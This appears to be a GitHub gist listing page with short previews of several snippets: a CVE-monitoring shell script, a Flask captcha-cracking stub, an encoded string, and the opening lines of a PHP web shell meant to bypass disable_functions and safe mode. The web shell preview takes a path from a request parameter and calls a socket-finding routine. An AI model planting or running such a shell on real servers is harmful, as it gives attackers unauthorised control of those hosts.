Skip to content

Instantly share code, notes, and snippets.

View code-scan's full-sized avatar
🏍️
On vacation

Cond0r code-scan

🏍️
On vacation
View GitHub Profile
@code-scan
code-scan / 12309.php
Created April 23, 2019 14:01
bypass_disable_function_and_safemode
<?php
//th1s 1s ultr4l33t php websh3ll || uz3 1t f0r 3duc4t10n4l purp0zes 0nly :P
if(isset($_GET['pfs'])) {
if(empty($_GET['path'])) {
$path="./";
} else {
$path=$_GET['path'];
}
findsock($path);
}
@code-scan
code-scan / Cve.sh
Last active October 31, 2021 15:18
github-CveMonitor
function CveMonitor(){
lastResult=$(cat last.txt)
result=$(curl -s 'https://api.github.com/search/repositories?sort=updated&order=desc&q=CVE-202'|jq '.items[]|.html_url +" "+.description+"|||"'|sed 's/"//g')
echo $result|sed 's/|||/\n/g' > current.txt
diff=$(diff last.txt current.txt|sort|uniq)
if [ -z "$diff" ];
then
echo not change
else
curl -G \
import json
import requests
import hashlib
import time
from urllib import parse
from capture import Crack
from flask import Flask, escape, request,make_response
app = Flask(__name__,static_folder="static",static_url_path="")
def auth():
@code-scan
code-scan / asd
Last active December 27, 2023 18:50
::::::::bKQYyjaa802SY7IWTKJ3lCxte2U3nKUsbs6T2g==::::::::